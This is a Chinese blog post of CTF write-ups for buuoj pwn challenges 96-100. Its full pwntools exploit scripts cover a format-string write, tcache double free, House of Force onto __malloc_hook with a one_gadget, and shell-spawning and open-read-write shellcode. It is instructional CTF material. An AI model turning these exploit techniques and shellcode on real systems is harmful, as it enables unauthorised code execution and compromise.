buuoj Pwn writeup 96-100

最新推荐文章于 2023-05-23 20:23:05 发布
最新推荐文章于 2023-05-23 20:23:05 发布
阅读量317 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/114189614
版权

96 mrctf2020_easy_equation

保护
在这里插入图片描述在这里插入图片描述格式化字符串漏洞,修改那个judge的值,满足式子,来拿到shell。

先计算一下那个judge需要修改成2

然后计算偏移。
在这里插入图片描述

from pwn import *
context.log_level='debug'

r = remote("node3.buuoj.cn",25108)

judge = 0x060105C

payload = "BB%9$nAAA"+p64(judge)

r.sendline(payload)
r.interactive()

97 ciscn_2019_final_2

保护
在这里插入图片描述
在这里插入图片描述
开了箱子。

在这里插入图片描述菜单堆。

在这里插入图片描述
详解dup()与dup2()

所以这里说半天就是把flag的fd指针改为666.

add

在这里插入图片描述只能申请0x20和0x10大小的chunk。

结构也简单。
在这里插入图片描述
这结构挺有意思的。

remove
在这里插入图片描述没有清理指针,但是设置了bool。但是设置的bool其实有个问题,因为int的指针跟short的指针是分开的,所以我们还是可以去制造double free。

show
在这里插入图片描述平平无奇输出函数。

leave and exit
在这里插入图片描述在这里插入图片描述

注意到是ubuntu18.04.所以我们需要注意tcache机制。

那么我们的整体思路是这样的。
首先我们利用这个题唯一的一个漏洞,uaf,来制造double free。这个漏洞还不是直接的uaf,它设置了一个bool来判断是否释放,但是两种类型的chunk是一个bool,所以我们只需要**“申请这个,释放那个”**,这样来制造double free。

制造double free之后用来输出地址,输出堆的地址。

add(1,0x30)
remove(1)
add(2,0x20)
add(2,0x20)
add(2,0x20)
add(2,0x20)
remove(2)
add(1,0x30)
remove(2)
addr_chunk0_prev_size = show(2) - 0xa0

print hex(addr_chunk0_prev_size)

输出了的地址,用于我们制造double free,来申请到第一个chunk。

add(2, addr_chunk0_prev_size)
add(2, addr_chunk0_prev_size)
add(2, 0x91)

申请到第一个chunk能干啥,我们可以改变它的size,然后多次释放它,它就会进入unsorted bin。从而我们用来泄露地址。

for i in range(0, 7):
    remove(1)
    add(2, 0x20)
remove(1)
 
malloc_hook = (show(1) & 0xfffffffffffff000) + (libc.sym['__malloc_hook'] & 0xfff)
libc_base = malloc_hook - libc.sym['__malloc_hook']
addr__IO_2_1_stdin__fileno = libc_base + libc.sym['_IO_2_1_stdin_'] + 0x70

print hex(libc_base)
print hex(addr__IO_2_1_stdin__fileno)

泄露地址我们用来干什么呢?看上面的代码里面,我们利用了一个地址。

libc.sym['_IO_2_1_stdin_'] + 0x70

这是个啥呢?
在这里插入图片描述这是那个chain区域。

chain这个指针是来干嘛的?
linux里面FILE结构体,是用单向链表连接在一起的。

这样做的目的是为了我们能够使用前面给的那个666的条件。

那我们现在地址也有了,想着就是怎么通过tcache 的double free 将那一块申请过来写上666,然后最后就输出一下就行。

我们先通过刚刚释放地址时候的情形,再次把那个chunk的fd位写上我们要攻击的地址。

add(1, addr__IO_2_1_stdin__fileno)

再次构造double free。

add(1, 0x30) 
remove(1)
add(2, 0x20)
remove(1)

在这里插入图片描述最后我们就一直申请chunk,从图中的3290,到3260,再到最后的fa70,写上我们的666,最后输出flag。

在这里插入图片描述

# -*- coding: utf-8 -*-
from pwn import *

#r = remote("node3.buuoj.cn", 28583)
r = process('./97')
elf = ELF('./97')
#libc = ELF('./64/libc-2.27.so')
libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
context.log_level = "debug"

def add(add_type, add_num):
    r.sendlineafter('which command?\n> ', '1')
    r.sendlineafter('TYPE:\n1: int\n2: short int\n>', str(add_type))
    r.sendafter('your inode number:', str(add_num))
 
def remove(remove_type):
    r.sendlineafter('which command?\n> ', '2')
    r.sendlineafter('TYPE:\n1: int\n2: short int\n>', str(remove_type))
 
def show(show_type):
    r.sendlineafter('which command?\n> ', '3')
    r.sendlineafter('TYPE:\n1: int\n2: short int\n>', str(show_type))
    if show_type == 1:
        r.recvuntil('your int type inode number :')
    elif show_type == 2:
        r.recvuntil('your short type inode number :')
    return int(r.recvuntil('\n'))
#这个地方就是没有去回车的话int这个方法会帮咱自动处理掉.
 
add(1,0x30)
remove(1)
add(2,0x20)
add(2,0x20)
add(2,0x20)
add(2,0x20)
remove(2)
add(1,0x30)
remove(2)
addr_chunk0_prev_size = show(2) - 0xa0

print hex(addr_chunk0_prev_size)

add(2, addr_chunk0_prev_size)
add(2, addr_chunk0_prev_size)
add(2, 0x91)
 
for i in range(0, 7):
    remove(1)
    add(2, 0x20)
remove(1)
 
malloc_hook = (show(1) & 0xfffffffffffff000) + (libc.sym['__malloc_hook'] & 0xfff)
libc_base = malloc_hook - libc.sym['__malloc_hook']
addr__IO_2_1_stdin__fileno = libc_base + libc.sym['_IO_2_1_stdin_'] + 0x70

print hex(libc_base)
print hex(addr__IO_2_1_stdin__fileno)

gdb.attach(r)

add(1, addr__IO_2_1_stdin__fileno)
add(1, 0x30) 
remove(1)
add(2, 0x20)
remove(1)
addr_chunk0_fd = show(1) - 0x30
add(1, addr_chunk0_fd)
add(1, addr_chunk0_fd)
add(1, 111)
add(1, 666)
 
r.sendlineafter('which command?\n> ', '4')
r.recvuntil('your message :')
 
r.interactive()

98 ciscn_2019_s_9

保护

在这里插入图片描述
在这里插入图片描述在这里插入图片描述给了hint。

在这里插入图片描述

看到没有开NX,所以肯定要写shellcode。
那其实我们可以直接将shellcode写到栈上,然后jum 到esp,从而执行shellcode,但是问题就是如果用pwntools写的话栈空间不够,所以只能自己手撸。

shellcode ='''
xor eax,eax             #eax置0
xor edx,edx				#edx置0
push edx				#将0入栈,标记了”/bin/sh”的结尾
push 0x68732f2f         #传递”/sh”,为了4字节对齐,使用//sh,这在execve()中等同于/sh
push 0x6e69622f         #传递“/bin”
mov ebx,esp             #此时esp指向了”/bin/sh”,通过esp将该字符串的值传递给ebx
xor ecx,ecx
mov al,0xB              #eax置为execve函数的中断号
int 0x80                #调用软中断
'''
shellcode=asm(shellcode)

这个也是我在网上嫖过来的一段很短的shellcode了。长度刚好只有23,是符合要求的。

那么我们写好shellcode之后,怎样才能去调用它呢。
当程序返回的时候,esp会返回到我们写的返回地址那里,去pop_rdi,我们可以去利用那个jmp,让eip跳到esp,此时esp已经又向上走了4个字节,所以就是可以直接去执行我们写在返回地址后面的汇编代码,那么这个汇编代码是干嘛的,就是用来去执行我们的shellcode,首先将栈抬起来,然后call esp,去执行shellcode。

from pwn import *

r = remote('node3.buuoj.cn',27725)
context(log_level='debug',arch='i386',os='linux')

jump_esp=0x8048554

shellcode='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xB
int 0x80
'''

shellcode=asm(shellcode)

payload=shellcode.ljust(0x24,'\x00')+p32(jump_esp)

payload+=asm("sub esp,40;call esp")

r.sendline(payload)
r.interactive()

99 gyctf_2020_force

保护

在这里插入图片描述
在这里插入图片描述
保护全绿,功能就两个,这种功能少的反而是非常难的。
其实看它那题目的名字,就猜到是house of force了……

add
在这里插入图片描述
平平无奇,结构简单的我不想画图。
size大小可以随便输入。
read这里可以溢出。
还会把你申请的chunk地址给你。

puts
在这里插入图片描述puts……是假的吧……

条件就个栈溢出,功能……可以说没有吧……

因为功能实在太少了。而且漏洞又比较符合house of force。

House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须得基于堆漏洞来进行利用。如果一个堆 (heap based) 漏洞想要通过 House Of Force 方法进行利用,需要以下条件:
能够以溢出等方式控制到 top chunk 的 size 域
能够自由地控制堆分配尺寸的大小

漏洞利用

第一步是泄露libc地址,当我们申请一个极大Chunk时,程序会调用mmap进行内存分配,分配的内存跟libc挨着,所以它给了我们申请的地址之后减去合适的差值就可以得到libc的地址。

第二步需要把top chunk大小改为0xFFFFFFFFFFFFFFFF,这样我们才能不限制地进行分配,这是因为malloc时会进行如下检查

(unsigned long) (size) >= (unsigned long) (nb + MINSIZE)

如果我们把top chunk大小改为0xFFFFFFFFFFFFFFFF,进行比较的时候会按照无符号数进行比较,就一定能通过检查,在进行此次分配时,我们还能顺便得到heap chunk的地址,并计算top chunk地址,之后计算malloc_hook与top chunk的偏移,记为offset

第三步需要分配offset -0x33(经过调试得到,当然因为对齐的原因不一定要0x33,0x37-0x30范围都可以,我们的目的是要把top_chunk搞到malloc_hook-0x20)的大小,此时我们得到的地址为__malloc_hook-0x10,这是因为本题中one_gadget需要利用realloc对栈进行调整

from pwn import *

r = remote("node3.buuoj.cn", 28429)

context.log_level = 'debug'

elf = ELF("./99")
libc = ELF('./64/libc-2.23.so')

one_gadget = 0x4526a

def add(size, content):
	r.recvuntil("2:puts\n")
	r.sendline('1')
	r.recvuntil("size\n")
	r.sendline(str(size))
	r.recvuntil("bin addr ")
	addr = int(r.recvuntil('\n').strip(), 16)
	r.recvuntil("content\n")
	r.send(content)
	return addr

def show(index):
	r.recvuntil("2:puts\n")
	r.sendline('2')

libc.address = add(0x200000, 'chunk0\n') + 0x200ff0
heap_addr = add(0x18, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
top = heap_addr + 0x10
malloc_hook = libc.sym['__malloc_hook']
one_gadget = one_gadget + libc.address
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()


add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))
r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(20))

r.interactive()

100 [极客大挑战 2019]Not Bad

保护

在这里插入图片描述在这里插入图片描述进来之后沙箱警告。
在这里插入图片描述

在这里插入图片描述
然后又是让我自己去写shellcode。

程序逻辑很简单,存在0x18字节溢出,看是否能进行栈迁移,目前可控输入只有buf,但是buf只有0x20大小不够rop,所以尝试别的方法。

在这里插入图片描述我们按照之前简单的思路,考虑将shellcode写在栈上,然后跳过去执行。

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"

#r = remote('node3.buuoj.cn',29796)
r = process("./100")
jmp_rsp = 0x400a01

shellcode ='''
xor rsi,rsi			
push rsi				
mov rdi,0x68732f2f6e69622f	 
push rdi
push rsp		
pop rdi				
mov al,59			
cdq					
syscall
'''
payload = asm(shellcode, arch = 'amd64', os = 'linux')
payload = payload.ljust(40, '\x00')
payload += p64(jmp_rsp)
payload += asm("sub rsp,48;call rsp", arch = 'amd64', os = 'linux')
#这个后面一定要跟arch os  不然默认的会是i386
print payload

gdb.attach(r)

r.sendlineafter("Easy shellcode, have fun!\n", payload)

r.interactive()

但是其实我们的这个是有问题的,问题就出在沙箱只给我们用orw一套。不能syscall。
但是buf的空间明显不够我们去手撸一整套,要想别的办法。

首先考虑那么往哪里写?
注意到

在这里插入图片描述

void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offsize)
mmap()用来将某个文件内容映射到内存中,对该内存区域的存取即是直接对该文件内容的读写

在这里插入图片描述prot位6的话是0110,是可写可执行。
flags位34的话00100010。

fd的话 参数fd:要映射到内存中的文件描述符。如果使用匿名内存映射时,即flags中设置了MAP_ANONYMOUS,fd设为-1。有些系统不支持匿名内存映射,则可以使用fopen打开/dev/zero文件,然后对该文件进行映射,可以同样达到匿名内存映射的效果。

那么我们完全可以写在这里,就解决了写shellcode的问题,我们最后确定利用方式,利用jmp rsp跳到栈上执行代码,然后在mmap那块把shellcode写上,再跳过去,执行。

# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'

context.arch='amd64'
context.os = "linux"

elf = ELF('./100')

r = remote('node3.buuoj.cn',27680)

jmp_rsp = 0x400A01
mmap = 0x123000

orw_payload = shellcraft.open("./flag")
orw_payload += shellcraft.read(3, mmap, 0x50)
orw_payload += shellcraft.write(1, mmap,0x50)
#这种写法要记好了.

payload = asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')
payload = payload.ljust(0x28,b'a')
payload += p64(jmp_esp)+asm('sub rsp,0x30;jmp rsp')
r.recvuntil('have fun!')
r.sendline(payload)

shellcode = asm(orw_payload)

r.sendline(shellcode)
r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUOJ [HCTF 2018]WarmUp
qq_43622442的博客
04-11 688
BUUOJ [HCTF 2018]WarmUp 第一次参加ctf,这次头铁的报名了网鼎,hhh,不能给队伍拖后腿了,还是刷刷题。 从buuoj一题一题开始刷,第一题WarmUp。 1.打开网站,发现只有一个滑稽: 2.因为是做的web题,不太可能是隐写,F12看看源码: 3.看到这个source.php没有?访问一下看看: 4.也就是代码审计了,不过这个咋和phpmyadmin的文件包含漏...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
BUUCTF-pwn(11)
njh18790816639的博客
01-09 2729
mrctf2020_easy_equation 简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞! axb_2019_fmt64 经典循环格式化字符串64位漏洞! 唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击! from elftools.construct.macros import Padding from pwn import * from LibcSearcher import * context(log_level='debu
buuoj 小明的保险箱 writeup
m0_73605862的博客
05-23 243
【来源】(buuoj)https://buuoj.cn/challenges#%E5%B0%8F%E6%98%8E%E7%9A%84%E4%BF%9D%E9%99%A9%E7%AE%B1。step3:根据题目提示是4位的纯数字所以是,选择所有数字,暴力破解,最大的长度和最小的长度都选择4,开始破解。得到一个rar文件夹。Step1:打开文件发现是一个图片,然后根据题目意思是有一个隐藏文件。【思路】得到隐藏文件并且暴力破解密码。Step4:得到密码,得到flag。【题目】小明的保险箱。
buuoj Pwn writeup 136-140
yongbaoii的博客
05-16 228
136 zctf_2016_note3 保护 菜单堆。 new 会有bss上的一个数组,用来存放chunk的大小以及最近一次申请回来的chunk的地址。 edit free 清理干净了。 137 wdb_2018_3rd_soEasy 保护 挺明显的。 因为没有开NX,还有栈溢出,所以直接写好shellcode然后跳回来到buf执行就好了。 exp from pwn import* r = remote("node3.buuoj.cn", 29859) r.recvuntil("0x") buf_a
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ssh2框架下多表查询的单个模块开发
01-28
基于ssh2框架下多表查询的单个模块开发。其中的页面跳转是通过MVC中的ModelandView实现的。
buuoj Pwn writeup 46-50
yongbaoii的博客
02-16 205
46 jarvisoj_test_your_memory 保护 这个地方有个溢出。 后门函数,cat flag都有,就直接一把梭。 from pwn import* r = process('./46') system_addr = 0x08048440 cat_flag = 0x080487E0 payload='A'*0x17 + p32(system_addr) + p32(cat_flag) + p32(cat_flag) r.sendline(payload) r.interac
buuoj Pwn writeup 286-290
yongbaoii的博客
09-06 229
286 metasequoia_2020_blacksmith 287 secretHolder_hitcon_2016 288 pwnable_dubblesort 289 pwnable_applestore 290 xp0intctf_2018_tutorial1
c语言 malloc 源码详解,dlmalloc源码剖析之:mALLOc
weixin_29541743的博客
05-19 926
/*如果你使用linux, douglea malloc已经默认作为glibc的malloc,新的版本可能用的是ptmalloc(dlmalloc的多线程版本)如果你用的bsd4.2及以前系统libc用的kingsley的malloc;BSD(包括freebsd,netbsd,openbsd)4.2以后版本libc用的是PHKmalloc;如果你用的windows系统用的是microsoft的分配...
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 575
buuctf wp
BUUCTF笔记之Web系列部分WriteUp(四)
热门推荐
克格莫
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
【八芒星计划】 _IO_2_1_stdout_和_IO_2_1_stdin_ 的任意地址读和任意地址写
carol2358的博客
09-04 891
文章目录前言一、GKCTF2020]Domo总结 前言 这篇记一下任意地址读和任意地址写 _IO_2_1_stdout_的任意地址读,_IO_write_base为读取的起始地址,_IO_write_ptr为读取的末地址,并且flag的值要得是0xfbad1800才能正常读取   _IO_2_1_stdin_的任意地址写跟_IO_2_1_stdout_的任意地址读类似,也是需要控制flag还有_IO_buf_base和_IO_buf_end。 这回除了flag、_IO_buf_base和_IO_b
buuoj Pwn writeup 51-55
yongbaoii的博客
02-16 261
51 cmcc_simplerop 保护 52 pwnable_orw 保护 53 jarvisoj_level1 保护 54 roarctf_2019_easy_pwn 保护 这个全绿有点厉害。 55 picoctf_2018_buffer overflow 2 保护
buuctf刷题记录24 equation
ytj00的博客
08-08 487
这道题又一次加强了我的z3 题目有个html打开得到 根据题目提示这个是f**k加密 可以到在线网站上一个个去解密,但是太麻烦了,用了个网上的脚本, 得到 最后有一个常量没解,放到上面网站解出81 头疼,全是解方程,可以用z3来解 构造脚本麻烦死了, from z3 import * if __name__ == "__main__": s = Solver() l = [Int('l[%d]' % i) for i in range(42)] #定义l[0] - l[41
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值